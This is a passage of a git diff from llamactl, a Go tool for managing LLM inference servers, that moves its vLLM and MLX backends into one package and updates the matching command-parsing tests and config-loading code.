opts.Port != 8080 { + t.Errorf("expected port 8080, got %d", opts.Port) + } + if opts.Temp != 0.7 { + t.Errorf("expected temp 0.7, got %f", opts.Temp) + } + if !opts.TrustRemoteCode { + t.Errorf("expected trust_remote_code to be true") + } + if opts.LogLevel != "DEBUG" { + t.Errorf("expected log_level 'DEBUG', got '%s'", opts.LogLevel) + } + }, + }, + { + name: "empty command", + command: "", + expectErr: true, + }, + { + name: "unterminated quote", + command: `mlx_lm.server --model test.mlx --chat-template "unterminated`, + expectErr: true, + }, + { + name: "malformed flag", + command: "mlx_lm.server ---model test.mlx", + expectErr: true, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + result, err := backends.ParseMlxCommand(tt.command) + + if tt.expectErr { + if err == nil { + t.Errorf("expected error but got none") + } + return + } + + if err != nil { + t.Errorf("unexpected error: %v", err) + return + } + + if result == nil { + t.Errorf("expected result but got nil") + return + } + + if tt.validate != nil { + tt.validate(t, result) + } + }) + } +} + +func TestMlxBuildCommandArgs_BooleanFields(t *testing.T) { + tests := []struct { + name string + options backends.MlxServerOptions + expected []string + excluded []string + }{ + { + name: "trust_remote_code true", + options: backends.MlxServerOptions{ + TrustRemoteCode: true, + }, + expected: []string{"--trust-remote-code"}, + }, + { + name: "trust_remote_code false", + options: backends.MlxServerOptions{ + TrustRemoteCode: false, + }, + excluded: []string{"--trust-remote-code"}, + }, + { + name: "multiple booleans", + options: backends.MlxServerOptions{ + TrustRemoteCode: true, + UseDefaultChatTemplate: true, + }, + expected: []string{"--trust-remote-code", "--use-default-chat-template"}, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + args := tt.options.BuildCommandArgs() + + for _, expectedArg := range tt.expected { + if !testutil.Contains(args, expectedArg) { + t.Errorf("Expected argument %q not found in 
%v", expectedArg, args) + } + } + + for _, excludedArg := range tt.excluded { + if testutil.Contains(args, excludedArg) { + t.Errorf("Excluded argument %q found in %v", excludedArg, args) + } + } + }) + } +} + +func TestMlxBuildCommandArgs_ZeroValues(t *testing.T) { + options := backends.MlxServerOptions{ + Port: 0, // Should be excluded + TopK: 0, // Should be excluded + Temp: 0, // Should be excluded + Model: "", // Should be excluded + LogLevel: "", // Should be excluded + TrustRemoteCode: false, // Should be excluded + } + + args := options.BuildCommandArgs() + + // Zero values should not appear in arguments + excludedArgs := []string{ + "--port", "0", + "--top-k", "0", + "--temp", "0", + "--model", "", + "--log-level", "", + "--trust-remote-code", + } + + for _, excludedArg := range excludedArgs { + if testutil.Contains(args, excludedArg) { + t.Errorf("Zero value argument %q should not be present in %v", excludedArg, args) + } + } +} \ No newline at end of file diff --git a/pkg/backends/vllm/vllm.go b/pkg/backends/vllm.go similarity index 90% rename from pkg/backends/vllm/vllm.go rename to pkg/backends/vllm.go index d4fee25..857eab3 100644 --- a/pkg/backends/vllm/vllm.go +++ b/pkg/backends/vllm.go @@ -1,11 +1,12 @@ -package vllm +package backends import ( - "llamactl/pkg/backends" + "fmt" + "llamactl/pkg/validation" ) -// multiValuedFlags defines flags that should be repeated for each value rather than comma-separated -var multiValuedFlags = map[string]bool{ +// vllmMultiValuedFlags defines flags that should be repeated for each value rather than comma-separated +var vllmMultiValuedFlags = map[string]bool{ "api-key": true, "allowed-origins": true, "allowed-methods": true, @@ -139,6 +140,36 @@ type VllmServerOptions struct { OverrideKVCacheALIGNSize int `json:"override_kv_cache_align_size,omitempty"` } +func (o *VllmServerOptions) GetPort() int { + return o.Port +} + +func (o *VllmServerOptions) SetPort(port int) { + o.Port = port +} + +func (o *VllmServerOptions) GetHost() string { + return o.Host +} + +func (o *VllmServerOptions) Validate() error { + if o == nil { + return validation.ValidationError(fmt.Errorf("vLLM server options cannot be nil for vLLM backend")) + } + + // Use reflection to check all string fields for injection patterns + if err := validation.ValidateStructStrings(o, ""); err != nil { + return err + } + + // Basic network validation for port + if o.Port < 0 || o.Port > 65535 { + return validation.ValidationError(fmt.Errorf("invalid port range: %d", o.Port)) + } + + return nil +} + // BuildCommandArgs converts VllmServerOptions to command line arguments // For vLLM native, model is a positional argument after "serve" func (o *VllmServerOptions) BuildCommandArgs() []string { @@ -155,7 +186,7 @@ func (o *VllmServerOptions) BuildCommandArgs() []string { // Use package-level multipleFlags variable - flagArgs := backends.BuildCommandArgs(&optionsCopy, multiValuedFlags) + flagArgs := BuildCommandArgs(&optionsCopy, vllmMultiValuedFlags) args = append(args, flagArgs...) return args @@ -165,7 +196,7 @@ func (o *VllmServerOptions) BuildDockerArgs() []string { var args []string // Use package-level multipleFlags variable - flagArgs := backends.BuildCommandArgs(o, multiValuedFlags) + flagArgs := BuildCommandArgs(o, vllmMultiValuedFlags) args = append(args, flagArgs...) 
return args @@ -192,7 +223,7 @@ func ParseVllmCommand(command string) (*VllmServerOptions, error) { } var vllmOptions VllmServerOptions - if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &vllmOptions); err != nil { + if err := ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &vllmOptions); err != nil { return nil, err } diff --git a/pkg/backends/vllm/vllm_test.go b/pkg/backends/vllm/vllm_test.go deleted file mode 100644 index ea13496..0000000 --- a/pkg/backends/vllm/vllm_test.go +++ /dev/null @@ -1,153 +0,0 @@ -package vllm_test - -import ( - "llamactl/pkg/backends/vllm" - "slices" - "testing" -) - -func TestParseVllmCommand(t *testing.T) { - tests := []struct { - name string - command string - expectErr bool - }{ - { - name: "basic vllm serve command", - command: "vllm serve microsoft/DialoGPT-medium", - expectErr: false, - }, - { - name: "serve only command", - command: "serve microsoft/DialoGPT-medium", - expectErr: false, - }, - { - name: "positional model with flags", - command: "vllm serve microsoft/DialoGPT-medium --tensor-parallel-size 2", - expectErr: false, - }, - { - name: "model with path", - command: "vllm serve /path/to/model --gpu-memory-utilization 0.8", - expectErr: false, - }, - { - name: "empty command", - command: "", - expectErr: true, - }, - { - name: "unterminated quote", - command: `vllm serve "unterminated`, - expectErr: true, - }, - } - - for _, tt := range tests { - t.Run(tt.name, func(t *testing.T) { - result, err := vllm.ParseVllmCommand(tt.command) - - if tt.expectErr { - if err == nil { - t.Errorf("expected error but got none") - } - return - } - - if err != nil { - t.Errorf("unexpected error: %v", err) - return - } - - if result == nil { - t.Errorf("expected result but got nil") - } - }) - } -} - -func TestParseVllmCommandValues(t *testing.T) { - command := "vllm serve test-model --tensor-parallel-size 4 --gpu-memory-utilization 0.8 --enable-log-outputs" - result, err := vllm.ParseVllmCommand(command) - - if err != nil { - t.Fatalf("unexpected error: %v", err) - } - - if result.Model != "test-model" { - t.Errorf("expected model 'test-model', got '%s'", result.Model) - } - if result.TensorParallelSize != 4 { - t.Errorf("expected tensor_parallel_size 4, got %d", result.TensorParallelSize) - } - if result.GPUMemoryUtilization != 0.8 { - t.Errorf("expected gpu_memory_utilization 0.8, got %f", result.GPUMemoryUtilization) - } - if !result.EnableLogOutputs { - t.Errorf("expected enable_log_outputs true, got %v", result.EnableLogOutputs) - } -} - -func TestBuildCommandArgs(t *testing.T) { - options := vllm.VllmServerOptions{ - Model: "microsoft/DialoGPT-medium", - Port: 8080, - Host: "localhost", - TensorParallelSize: 2, - GPUMemoryUtilization: 0.8, - EnableLogOutputs: true, - AllowedOrigins: []string{"http://localhost:3000", "https://example.com"}, - } - - args := options.BuildCommandArgs() - - // Check that model is the first positional argument (not a --model flag) - if len(args) == 0 || args[0] != "microsoft/DialoGPT-medium" { - t.Errorf("Expected model 'microsoft/DialoGPT-medium' as first positional argument, got args: %v", args) - } - - // Check that --model flag is NOT present (since model should be positional) - if contains(args, "--model") { - t.Errorf("Found --model flag, but model should be positional argument in args: %v", args) - } - - // Check other flags - if !containsFlagWithValue(args, "--tensor-parallel-size", "2") { - t.Errorf("Expected --tensor-parallel-size 2 not found in %v", 
args) - } - if !contains(args, "--enable-log-outputs") { - t.Errorf("Expected --enable-log-outputs not found in %v", args) - } - if !contains(args, "--host") { - t.Errorf("Expected --host not found in %v", args) - } - if !contains(args, "--port") { - t.Errorf("Expected --port not found in %v", args) - } - - // Check array handling (multiple flags) - allowedOriginsCount := 0 - for i := range args { - if args[i] == "--allowed-origins" { - allowedOriginsCount++ - } - } - if allowedOriginsCount != 2 { - t.Errorf("Expected 2 --allowed-origins flags, got %d", allowedOriginsCount) - } -} - -// Helper functions -func contains(slice []string, item string) bool { - return slices.Contains(slice, item) -} - -func containsFlagWithValue(args []string, flag, value string) bool { - for i, arg := range args { - if arg == flag && i+1 < len(args) && args[i+1] == value { - return true - } - } - return false -} diff --git a/pkg/backends/vllm_test.go b/pkg/backends/vllm_test.go new file mode 100644 index 0000000..b9e6a13 --- /dev/null +++ b/pkg/backends/vllm_test.go @@ -0,0 +1,286 @@ +package backends_test + +import ( + "llamactl/pkg/backends" + "llamactl/pkg/testutil" + "testing" +) + +func TestParseVllmCommand(t *testing.T) { + tests := []struct { + name string + command string + expectErr bool + validate func(*testing.T, *backends.VllmServerOptions) + }{ + { + name: "basic vllm serve command", + command: "vllm serve microsoft/DialoGPT-medium", + expectErr: false, + validate: func(t *testing.T, opts *backends.VllmServerOptions) { + if opts.Model != "microsoft/DialoGPT-medium" { + t.Errorf("expected model 'microsoft/DialoGPT-medium', got '%s'", opts.Model) + } + }, + }, + { + name: "serve only command", + command: "serve microsoft/DialoGPT-medium", + expectErr: false, + validate: func(t *testing.T, opts *backends.VllmServerOptions) { + if opts.Model != "microsoft/DialoGPT-medium" { + t.Errorf("expected model 'microsoft/DialoGPT-medium', got '%s'", opts.Model) + } + }, + }, + { + name: "positional model with flags", + command: "vllm serve microsoft/DialoGPT-medium --tensor-parallel-size 2", + expectErr: false, + validate: func(t *testing.T, opts *backends.VllmServerOptions) { + if opts.Model != "microsoft/DialoGPT-medium" { + t.Errorf("expected model 'microsoft/DialoGPT-medium', got '%s'", opts.Model) + } + if opts.TensorParallelSize != 2 { + t.Errorf("expected tensor_parallel_size 2, got %d", opts.TensorParallelSize) + } + }, + }, + { + name: "model with path", + command: "vllm serve /path/to/model --gpu-memory-utilization 0.8", + expectErr: false, + validate: func(t *testing.T, opts *backends.VllmServerOptions) { + if opts.Model != "/path/to/model" { + t.Errorf("expected model '/path/to/model', got '%s'", opts.Model) + } + if opts.GPUMemoryUtilization != 0.8 { + t.Errorf("expected gpu_memory_utilization 0.8, got %f", opts.GPUMemoryUtilization) + } + }, + }, + { + name: "multiple value types", + command: "vllm serve test-model --tensor-parallel-size 4 --gpu-memory-utilization 0.8 --enable-log-outputs", + expectErr: false, + validate: func(t *testing.T, opts *backends.VllmServerOptions) { + if opts.Model != "test-model" { + t.Errorf("expected model 'test-model', got '%s'", opts.Model) + } + if opts.TensorParallelSize != 4 { + t.Errorf("expected tensor_parallel_size 4, got %d", opts.TensorParallelSize) + } + if opts.GPUMemoryUtilization != 0.8 { + t.Errorf("expected gpu_memory_utilization 0.8, got %f", opts.GPUMemoryUtilization) + } + if !opts.EnableLogOutputs { + t.Errorf("expected enable_log_outputs true, got 
%v", opts.EnableLogOutputs) + } + }, + }, + { + name: "empty command", + command: "", + expectErr: true, + }, + { + name: "unterminated quote", + command: `vllm serve "unterminated`, + expectErr: true, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + result, err := backends.ParseVllmCommand(tt.command) + + if tt.expectErr { + if err == nil { + t.Errorf("expected error but got none") + } + return + } + + if err != nil { + t.Errorf("unexpected error: %v", err) + return + } + + if result == nil { + t.Errorf("expected result but got nil") + return + } + + if tt.validate != nil { + tt.validate(t, result) + } + }) + } +} + +func TestVllmBuildCommandArgs_BooleanFields(t *testing.T) { + tests := []struct { + name string + options backends.VllmServerOptions + expected []string + excluded []string + }{ + { + name: "enable_log_outputs true", + options: backends.VllmServerOptions{ + EnableLogOutputs: true, + }, + expected: []string{"--enable-log-outputs"}, + }, + { + name: "enable_log_outputs false", + options: backends.VllmServerOptions{ + EnableLogOutputs: false, + }, + excluded: []string{"--enable-log-outputs"}, + }, + { + name: "multiple booleans", + options: backends.VllmServerOptions{ + EnableLogOutputs: true, + TrustRemoteCode: true, + EnablePrefixCaching: true, + DisableLogStats: false, + }, + expected: []string{"--enable-log-outputs", "--trust-remote-code", "--enable-prefix-caching"}, + excluded: []string{"--disable-log-stats"}, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + args := tt.options.BuildCommandArgs() + + for _, expectedArg := range tt.expected { + if !testutil.Contains(args, expectedArg) { + t.Errorf("Expected argument %q not found in %v", expectedArg, args) + } + } + + for _, excludedArg := range tt.excluded { + if testutil.Contains(args, excludedArg) { + t.Errorf("Excluded argument %q found in %v", excludedArg, args) + } + } + }) + } +} + +func TestVllmBuildCommandArgs_ZeroValues(t *testing.T) { + options := backends.VllmServerOptions{ + Port: 0, // Should be excluded + TensorParallelSize: 0, // Should be excluded + GPUMemoryUtilization: 0, // Should be excluded + Model: "", // Should be excluded (positional arg) + Host: "", // Should be excluded + EnableLogOutputs: false, // Should be excluded + } + + args := options.BuildCommandArgs() + + // Zero values should not appear in arguments + excludedArgs := []string{ + "--port", "0", + "--tensor-parallel-size", "0", + "--gpu-memory-utilization", "0", + "--host", "", + "--enable-log-outputs", + } + + for _, excludedArg := range excludedArgs { + if testutil.Contains(args, excludedArg) { + t.Errorf("Zero value argument %q should not be present in %v", excludedArg, args) + } + } + + // Model should not be present as positional arg when empty + if len(args) > 0 && args[0] == "" { + t.Errorf("Empty model should not be present as positional argument") + } +} + +func TestVllmBuildCommandArgs_ArrayFields(t *testing.T) { + options := backends.VllmServerOptions{ + AllowedOrigins: []string{"http://localhost:3000", "https://example.com"}, + AllowedMethods: []string{"GET", "POST"}, + Middleware: []string{"middleware1", "middleware2", "middleware3"}, + } + + args := options.BuildCommandArgs() + + // Check that each array value appears with its flag + expectedOccurrences := map[string][]string{ + "--allowed-origins": {"http://localhost:3000", "https://example.com"}, + "--allowed-methods": {"GET", "POST"}, + "--middleware": {"middleware1", "middleware2", "middleware3"}, + } + + for 
flag, values := range expectedOccurrences { + for _, value := range values { + if !testutil.ContainsFlagWithValue(args, flag, value) { + t.Errorf("Expected %s %s, not found in %v", flag, value, args) + } + } + } +} + +func TestVllmBuildCommandArgs_EmptyArrays(t *testing.T) { + options := backends.VllmServerOptions{ + AllowedOrigins: []string{}, // Empty array should not generate args + Middleware: []string{}, // Empty array should not generate args + } + + args := options.BuildCommandArgs() + + excludedArgs := []string{"--allowed-origins", "--middleware"} + for _, excludedArg := range excludedArgs { + if testutil.Contains(args, excludedArg) { + t.Errorf("Empty array should not generate argument %q in %v", excludedArg, args) + } + } +} + +func TestVllmBuildCommandArgs_PositionalModel(t *testing.T) { + options := backends.VllmServerOptions{ + Model: "microsoft/DialoGPT-medium", + Port: 8080, + Host: "localhost", + TensorParallelSize: 2, + GPUMemoryUtilization: 0.8, + EnableLogOutputs: true, + } + + args := options.BuildCommandArgs() + + // Check that model is the first positional argument (not a --model flag) + if len(args) == 0 || args[0] != "microsoft/DialoGPT-medium" { + t.Errorf("Expected model 'microsoft/DialoGPT-medium' as first positional argument, got args: %v", args) + } + + // Check that --model flag is NOT present (since model should be positional) + if testutil.Contains(args, "--model") { + t.Errorf("Found --model flag, but model should be positional argument in args: %v", args) + } + + // Check other flags + if !testutil.ContainsFlagWithValue(args, "--tensor-parallel-size", "2") { + t.Errorf("Expected --tensor-parallel-size 2 not found in %v", args) + } + if !testutil.ContainsFlagWithValue(args, "--gpu-memory-utilization", "0.8") { + t.Errorf("Expected --gpu-memory-utilization 0.8 not found in %v", args) + } + if !testutil.Contains(args, "--enable-log-outputs") { + t.Errorf("Expected --enable-log-outputs not found in %v", args) + } + if !testutil.ContainsFlagWithValue(args, "--host", "localhost") { + t.Errorf("Expected --host localhost not found in %v", args) + } + if !testutil.ContainsFlagWithValue(args, "--port", "8080") { + t.Errorf("Expected --port 8080 not found in %v", args) + } +} diff --git a/pkg/config/config.go b/pkg/config/config.go index d6ee420..517a3c3 100644 --- a/pkg/config/config.go +++ b/pkg/config/config.go @@ -150,9 +150,7 @@ func LoadConfig(configPath string) (AppConfig, error) { EnableSwagger: false, }, LocalNode: "main", - Nodes: map[string]NodeConfig{ - "main": {}, // Local node with empty config - }, + Nodes: map[string]NodeConfig{}, Backends: BackendConfig{ LlamaCpp: BackendSettings{ Command: "llama-server", @@ -217,6 +215,11 @@ func LoadConfig(configPath string) (AppConfig, error) { return cfg, err } + // If local node is not defined in nodes, add it with default config + if _, ok := cfg.Nodes[cfg.LocalNode]; !ok { + cfg.Nodes[cfg.LocalNode] = NodeConfig{} + } + // 3. 
Override with environment variables loadEnvVars(&cfg) @@ -601,17 +604,3 @@ func getDefaultConfigLocations() []string { return locations } - -// GetBackendSettings resolves backend settings -func (bc *BackendConfig) GetBackendSettings(backendType string) BackendSettings { - switch backendType { - case "llama-cpp": - return bc.LlamaCpp - case "vllm": - return bc.VLLM - case "mlx": - return bc.MLX - default: - return BackendSettings{} - } -} diff --git a/pkg/config/config_test.go b/pkg/config/config_test.go index 964708e..5be2199 100644 --- a/pkg/config/config_test.go +++ b/pkg/config/config_test.go @@ -7,6 +7,20 @@ import ( "testing" ) +// GetBackendSettings resolves backend settings +func getBackendSettings(bc *config.BackendConfig, backendType string) config.BackendSettings { + switch backendType { + case "llama-cpp": + return bc.LlamaCpp + case "vllm": + return bc.VLLM + case "mlx": + return bc.MLX + default: + return config.BackendSettings{} + } +} + func TestLoadConfig_Defaults(t *testing.T) { // Test loading config when no file exists and no env vars set cfg, err := config.LoadConfig("nonexistent-file.yaml") @@ -205,29 +219,6 @@ instances: } } -func TestLoadConfig_InvalidYAML(t *testing.T) { - // Create a temporary config file with invalid YAML - tempDir := t.TempDir() - configFile := filepath.Join(tempDir, "invalid-config.yaml") - - invalidContent := ` -server: - host: "localhost" - port: not-a-number -instances: - [invalid yaml structure -` - - err := os.WriteFile(configFile, []byte(invalidContent), 0644) - if err != nil { - t.Fatalf("Failed to write test config file: %v", err) - } - - _, err = config.LoadConfig(configFile) - if err == nil { - t.Error("Expected LoadConfig to return error for invalid YAML") - } -} func TestParsePortRange(t *testing.T) { tests := []struct { @@ -257,97 +248,6 @@ func TestParsePortRange(t *testing.T) { } } -// Remove the getDefaultConfigLocations test entirely - -func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) { - // Test that environment variables are properly converted to correct types - testCases := []struct { - envVar string - envValue string - checkFn func(*config.AppConfig) bool - desc string - }{ - { - envVar: "LLAMACTL_PORT", - envValue: "invalid-port", - checkFn: func(c *config.AppConfig) bool { return c.Server.Port == 8080 }, // Should keep default - desc: "invalid port number should keep default", - }, - { - envVar: "LLAMACTL_MAX_INSTANCES", - envValue: "not-a-number", - checkFn: func(c *config.AppConfig) bool { return c.Instances.MaxInstances == -1 }, // Should keep default - desc: "invalid max instances should keep default", - }, - { - envVar: "LLAMACTL_DEFAULT_AUTO_RESTART", - envValue: "invalid-bool", - checkFn: func(c *config.AppConfig) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default - desc: "invalid boolean should keep default", - }, - { - envVar: "LLAMACTL_INSTANCE_PORT_RANGE", - envValue: "invalid-range", - checkFn: func(c *config.AppConfig) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default - desc: "invalid port range should keep default", - }, - } - - for _, tc := range testCases { - t.Run(tc.desc, func(t *testing.T) { - os.Setenv(tc.envVar, tc.envValue) - defer os.Unsetenv(tc.envVar) - - cfg, err := config.LoadConfig("nonexistent-file.yaml") - if err != nil { - t.Fatalf("LoadConfig failed: %v", err) - } - - if !tc.checkFn(&cfg) { - t.Errorf("Test failed: %s", tc.desc) - } - }) - } -} - -func TestLoadConfig_PartialFile(t *testing.T) { - // Test that partial 
config files work correctly (missing sections should use defaults)
-	tempDir := t.TempDir()
-	configFile := filepath.Join(tempDir, "partial-config.yaml")
-
-	// Only specify server config, instances should use defaults
-	configContent := `
-server:
-  host: "partial-host"
-  port: 7777
-`
-
-	err := os.WriteFile(configFile, []byte(configContent), 0644)
-	if err != nil {
-		t.Fatalf("Failed to write test config file: %v", err)
-	}
-
-	cfg, err := config.LoadConfig(configFile)
-	if err != nil {
-		t.Fatalf("LoadConfig failed: %v", err)
-	}
-
-	// Server config should be from file
-	if cfg.Server.Host != "partial-host" {
-		t.Errorf("Expected host 'partial-host', got %q", cfg.Server.Host)
-	}
-	if cfg.Server.Port != 7777 {
-		t.Errorf("Expected port 7777, got %d", cfg.Server.Port)
-	}
-
-	// Instances config should be defaults
-	if cfg.Instances.PortRange != [2]int{8000, 9000} {
-		t.Errorf("Expected default port range [8000, 9000], got %v", cfg.Instances.PortRange)
-	}
-	if cfg.Instances.MaxInstances != -1 {
-		t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances)
-	}
-}
 
 func TestGetBackendSettings_NewStructuredConfig(t *testing.T) {
 	bc := &config.BackendConfig{
@@ -372,7 +272,7 @@ func TestGetBackendSettings_NewStructuredConfig(t *testing.T) {
 	}
 
 	// Test llama-cpp with Docker
-	settings := bc.GetBackendSettings("llama-cpp")
+	settings := getBackendSettings(bc, "llama-cpp")
 	if settings.Command != "custom-llama" {
 		t.Errorf("Expected command 'custom-llama', got %q", settings.Command)
 	}
@@ -387,7 +287,7 @@ func TestGetBackendSettings_NewStructuredConfig(t *testing.T) {
 	}
 
 	// Test vLLM without Docker
-	settings = bc.GetBackendSettings("vllm")
+	settings = getBackendSettings(bc, "vllm")
 	if settings.Command != "custom-vllm" {
 		t.Errorf("Expected command 'custom-vllm', got %q", settings.Command)
 	}
@@ -399,33 +299,12 @@ func TestGetBackendSettings_NewStructuredConfig(t *testing.T) {
 	}
 
 	// Test MLX
-	settings = bc.GetBackendSettings("mlx")
+	settings = getBackendSettings(bc, "mlx")
 	if settings.Command != "custom-mlx" {
 		t.Errorf("Expected command 'custom-mlx', got %q", settings.Command)
 	}
 }
 
-func TestGetBackendSettings_EmptyConfig(t *testing.T) {
-	bc := &config.BackendConfig{}
-
-	// Test empty llama-cpp
-	settings := bc.GetBackendSettings("llama-cpp")
-	if settings.Command != "" {
-		t.Errorf("Expected empty command, got %q", settings.Command)
-	}
-
-	// Test empty vLLM
-	settings = bc.GetBackendSettings("vllm")
-	if settings.Command != "" {
-		t.Errorf("Expected empty command, got %q", settings.Command)
-	}
-
-	// Test empty MLX
-	settings = bc.GetBackendSettings("mlx")
-	if settings.Command != "" {
-		t.Errorf("Expected empty command, got %q", settings.Command)
-	}
-}
 
 func TestLoadConfig_BackendEnvironmentVariables(t *testing.T) {
 	// Test that backend environment variables work correctly
@@ -496,20 +375,6 @@ func TestLoadConfig_BackendEnvironmentVariables(t *testing.T) {
 	}
 }
 
-func TestGetBackendSettings_InvalidBackendType(t *testing.T) {
-	bc := &config.BackendConfig{
-		LlamaCpp: config.BackendSettings{
-			Command: "llama-server",
-			Args:    []string{},
-		},
-	}
-
-	// Test invalid backend type returns empty settings
-	settings := bc.GetBackendSettings("invalid-backend")
-	if settings.Command != "" {
-		t.Errorf("Expected empty command for invalid backend, got %q", settings.Command)
-	}
-}
 
 func TestLoadConfig_LocalNode(t *testing.T) {
 	t.Run("default local node", func(t *testing.T) {
@@ -552,8 +417,8 @@ nodes:
 	}
 
 	// Verify nodes map (worker1 + worker2; no default "main" since local_node is overridden)
len(cfg.Nodes) != 3 { - t.Errorf("Expected 3 nodes (default main + worker1 + worker2), got %d", len(cfg.Nodes)) + if len(cfg.Nodes) != 2 { + t.Errorf("Expected 2 nodes (default worker1 + worker2), got %d", len(cfg.Nodes)) } // Verify local node exists and is empty @@ -579,8 +444,8 @@ nodes: // Verify default main node still exists _, exists = cfg.Nodes["main"] - if !exists { - t.Error("Expected default 'main' node to still exist in nodes map") + if exists { + t.Error("Default 'main' node should not exist when local_node is overridden") } }) @@ -612,8 +477,8 @@ nodes: } // Verify nodes map includes default "main" + primary + worker1 - if len(cfg.Nodes) != 3 { - t.Errorf("Expected 3 nodes (default main + primary + worker1), got %d", len(cfg.Nodes)) + if len(cfg.Nodes) != 2 { + t.Errorf("Expected 2 nodes (primary + worker1), got %d", len(cfg.Nodes)) } localNode, exists := cfg.Nodes["primary"] diff --git a/pkg/instance/instance.go b/pkg/instance/instance.go index ee6757d..762d49e 100644 --- a/pkg/instance/instance.go +++ b/pkg/instance/instance.go @@ -3,7 +3,6 @@ package instance import ( "encoding/json" "fmt" - "llamactl/pkg/backends" "llamactl/pkg/config" "log" "net/http/httputil" @@ -124,48 +123,6 @@ func (i *Instance) IsRunning() bool { return i.status.isRunning() } -func (i *Instance) GetPort() int { - opts := i.GetOptions() - if opts != nil { - switch opts.BackendType { - case backends.BackendTypeLlamaCpp: - if opts.LlamaServerOptions != nil { - return opts.LlamaServerOptions.Port - } - case backends.BackendTypeMlxLm: - if opts.MlxServerOptions != nil { - return opts.MlxServerOptions.Port - } - case backends.BackendTypeVllm: - if opts.VllmServerOptions != nil { - return opts.VllmServerOptions.Port - } - } - } - return 0 -} - -func (i *Instance) GetHost() string { - opts := i.GetOptions() - if opts != nil { - switch opts.BackendType { - case backends.BackendTypeLlamaCpp: - if opts.LlamaServerOptions != nil { - return opts.LlamaServerOptions.Host - } - case backends.BackendTypeMlxLm: - if opts.MlxServerOptions != nil { - return opts.MlxServerOptions.Host - } - case backends.BackendTypeVllm: - if opts.VllmServerOptions != nil { - return opts.VllmServerOptions.Host - } - } - } - return "" -} - // SetOptions sets the options func (i *Instance) SetOptions(opts *Options) { if opts == nil { @@ -198,6 +155,20 @@ func (i *Instance) SetTimeProvider(tp TimeProvider) { } } +func (i *Instance) GetHost() string { + if i.options == nil { + return "localhost" + } + return i.options.GetHost() +} + +func (i *Instance) GetPort() int { + if i.options == nil { + return 0 + } + return i.options.GetPort() +} + // GetProxy returns the reverse proxy for this instance func (i *Instance) GetProxy() (*httputil.ReverseProxy, error) { if i.proxy == nil { @@ -266,39 +237,31 @@ func (i *Instance) ShouldTimeout() bool { return i.proxy.shouldTimeout() } -// getBackendHostPort extracts the host and port from instance options -// Returns the configured host and port for the backend -func (i *Instance) getBackendHostPort() (string, int) { +func (i *Instance) getCommand() string { opts := i.GetOptions() if opts == nil { - return "localhost", 0 + return "" } - var host string - var port int - switch opts.BackendType { - case backends.BackendTypeLlamaCpp: - if opts.LlamaServerOptions != nil { - host = opts.LlamaServerOptions.Host - port = opts.LlamaServerOptions.Port - } - case backends.BackendTypeMlxLm: - if opts.MlxServerOptions != nil { - host = opts.MlxServerOptions.Host - port = opts.MlxServerOptions.Port - } - case 
-		if opts.VllmServerOptions != nil {
-			host = opts.VllmServerOptions.Host
-			port = opts.VllmServerOptions.Port
-		}
+	return opts.BackendOptions.GetCommand(i.globalBackendSettings)
+}
+
+func (i *Instance) buildCommandArgs() []string {
+	opts := i.GetOptions()
+	if opts == nil {
+		return nil
 	}
-	if host == "" {
-		host = "localhost"
+	return opts.BackendOptions.BuildCommandArgs(i.globalBackendSettings)
+}
+
+func (i *Instance) buildEnvironment() map[string]string {
+	opts := i.GetOptions()
+	if opts == nil {
+		return nil
 	}
-	return host, port
+	return opts.BackendOptions.BuildEnvironment(i.globalBackendSettings, opts.Environment)
 }
 
 // MarshalJSON implements json.Marshaler for Instance
@@ -307,21 +270,10 @@ func (i *Instance) MarshalJSON() ([]byte, error) {
 	opts := i.GetOptions()
 
 	// Determine if docker is enabled for this instance's backend
-	var dockerEnabled bool
-	if opts != nil {
-		switch opts.BackendType {
-		case backends.BackendTypeLlamaCpp:
-			if i.globalBackendSettings != nil && i.globalBackendSettings.LlamaCpp.Docker != nil && i.globalBackendSettings.LlamaCpp.Docker.Enabled {
-				dockerEnabled = true
-			}
-		case backends.BackendTypeVllm:
-			if i.globalBackendSettings != nil && i.globalBackendSettings.VLLM.Docker != nil && i.globalBackendSettings.VLLM.Docker.Enabled {
-				dockerEnabled = true
-			}
-		case backends.BackendTypeMlxLm:
-			// MLX does not support docker currently
-		}
-	}
+	var dockerEnabled bool
+	if opts != nil {
+		dockerEnabled = opts.BackendOptions.IsDockerEnabled(i.globalBackendSettings)
+	}
 
 	return json.Marshal(&struct {
 		Name   string `json:"name"`
diff --git a/pkg/instance/instance_test.go b/pkg/instance/instance_test.go
index 375c210..2654f8c 100644
--- a/pkg/instance/instance_test.go
+++ b/pkg/instance/instance_test.go
@@ -3,7 +3,6 @@ package instance_test
 import (
 	"encoding/json"
 	"llamactl/pkg/backends"
-	"llamactl/pkg/backends/llamacpp"
 	"llamactl/pkg/config"
 	"llamactl/pkg/instance"
 	"llamactl/pkg/testutil"
@@ -35,10 +34,12 @@ func TestNewInstance(t *testing.T) {
 	}
 
 	options := &instance.Options{
-		BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
-			Port:  8080,
+		BackendOptions: backends.Options{
+			BackendType: backends.BackendTypeLlamaCpp,
+			LlamaServerOptions: &backends.LlamaServerOptions{
+				Model: "/path/to/model.gguf",
+				Port:  8080,
+			},
 		},
 	}
 
@@ -56,8 +57,8 @@ func TestNewInstance(t *testing.T) {
 
 	// Check that options were properly set with defaults applied
 	opts := inst.GetOptions()
-	if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
-		t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
+	if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/model.gguf" {
+		t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model)
 	}
 	if inst.GetPort() != 8080 {
 		t.Errorf("Expected port 8080, got %d", inst.GetPort())
@@ -73,61 +74,29 @@ func TestNewInstance(t *testing.T) {
 	if opts.RestartDelay == nil || *opts.RestartDelay != 5 {
